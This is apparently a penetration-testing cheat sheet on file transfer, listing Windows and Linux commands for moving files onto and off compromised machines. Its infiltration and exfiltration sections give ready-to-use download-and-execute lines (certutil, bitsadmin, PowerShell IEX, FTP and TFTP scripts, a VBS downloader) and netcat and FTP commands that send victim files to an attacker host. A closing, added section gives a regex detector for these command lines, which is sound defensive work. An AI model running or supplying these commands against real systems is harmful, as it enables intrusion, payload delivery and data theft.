File Transfer

tip

With physical access, also consider the USB port (USB key or smartphone), direct Wi-Fi, Bluetooth, and SD cards.

Listeners​

Windows​

nc -lvp <port> < <file>
Attachment

Linux​

info

Check the Linux listeners used for file transfer.

Infiltration - Downloaders​

SMB​

\\<ip>\<share>\<file>
copy \\<ip>\<share>\<file> <file>

Mount a temporary network share

net share NetworkFiles=<C:\...\share_folder> /grant:everyone,full

Sysinternals​

bitsadmin /transfer mydownloadjob /download /priority normal <http://attackerIP/executable.exe> <C:\\Users\\%USERNAME%\\AppData\\local\\temp\\executable.exe>
certutil.exe -urlcache -split -f <URL> <output.file>
certutil.exe -encode <original_file> <b64encoded_file>
certutil.exe -decode <file.txt> <file.exe>

Executables​

notepad.exe <url>

PowerShell​

(New-Object System.Net.WebClient).DownloadFile("<http://server/file.txt>", "<C:\Windows\Temp\file.txt>")

Invoke-WebRequest "<http://server/file.txt>" -OutFile "<C:\Windows\Temp\file.txt>"

$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('<http://server/file.txt>'));

echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "<url>" >> get.ps1
echo $file = "<filename>" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

FTP​

echo open <attackerip> 21> ftp.txt
echo USER <username> <password> >> ftp.txt
echo bin >> ftp.txt
echo GET <evil.exe> >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

TFTP​

In Kali

service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp

Enable TFTP

pkgmgr /iu:"TFTP"
tftp -i <ip_target> GET <nc.exe>

VBS​

tip

Run unix2dos on the script before copying it.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs <url> <out_file>

Debug.exe​

The file to upload must be under the 64K limit.

upx -9 <file.exe>
/usr/share/windows-binaries/exe2bat.exe <file.exe> <file.txt>

Then copy and paste the contents into your reverse shell to create the file on the target.

Exfiltration​

tip

If not mentioned otherwise, the first command is run on the victim and the second on Kali.

copy <file> \\<ip>\<share>\

smbserver.py <share> .

nc <ip> <port> < <file>

nc -lvp <port> > <file>

echo open <ip> > ftp.bat
echo <user> >>ftp.bat
echo <pass> >>ftp.bat
echo binary >>ftp.bat
echo mput <C:\Users\user\desktop\test.txt> >>ftp.bat
echo quit >>ftp.bat

ftp -i -s:.\ftp.bat
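
Detection view of the commands on this page, as an added example that is not part of the original page: a first-pass matcher for the Windows transfer command lines listed above, run over process-creation command lines. The rule names, the sample command lines and the 192.0.2.x addresses are constructed for illustration.

```python
import re

# Hypothetical rule names; each pattern mirrors one command line from this page.
# Matching is case-insensitive because cmd.exe and PowerShell ignore case.
RULES = [
    ("certutil-urlcache", re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b", re.I)),
    ("certutil-encode-decode", re.compile(r"\bcertutil(\.exe)?\b.*[-/](en|de)code\b", re.I)),
    ("bitsadmin-transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("powershell-webclient", re.compile(r"\bNet\.WebClient\b|\bDownload(File|String)\b", re.I)),
    ("powershell-iwr-outfile", re.compile(r"\bInvoke-WebRequest\b.*-OutFile\b", re.I)),
    ("powershell-policy-bypass", re.compile(r"\bpowershell(\.exe)?\b.*-ExecutionPolicy\s+Bypass\b", re.I)),
    ("ftp-script", re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("tftp-get", re.compile(r"\btftp(\.exe)?\b.*\s-i\b.*\bGET\b", re.I)),
    ("cscript-vbs-url", re.compile(r"\bcscript(\.exe)?\b.*\.vbs\b.*https?://", re.I)),
    ("net-share-everyone", re.compile(r"\bnet1?(\.exe)?\s+share\b.*/grant:everyone", re.I)),
]

# Constructed sample: the CommandLine field of process-creation events
# (for example Sysmon event 1 or Security event 4688). The last two are benign.
SAMPLE = [
    r"certutil.exe -urlcache -split -f http://192.0.2.10/a.bin C:\Windows\Temp\a.bin",
    r"CertUtil -decode C:\Windows\Temp\file.txt C:\Windows\Temp\file.exe",
    r"bitsadmin /transfer mydownloadjob /download /priority normal http://192.0.2.10/x.exe C:\Temp\x.exe",
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1",
    r"powershell -c (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/f.txt','C:\Temp\f.txt')",
    r"ftp -i -s:.\ftp.bat",
    r"tftp -i 192.0.2.10 GET nc.exe",
    r"cscript wget.vbs http://192.0.2.10/f.txt out.txt",
    r"certutil.exe -verify C:\certs\server.cer",
    r"ftp.exe 192.0.2.20",
]

def classify(command_line):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(command_lines):
    """Return (command_line, rule_names) for every line with at least one hit."""
    hits = ((c, classify(c)) for c in command_lines)
    return [(c, h) for c, h in hits if h]

if __name__ == "__main__":
    for cmd, names in scan(SAMPLE):
        print(", ".join(names), "<-", cmd)
```

Command-line matching like this is a coarse first pass; pair it with PowerShell script block logging and proxy or firewall logs, since the same transfers can be expressed in other ways.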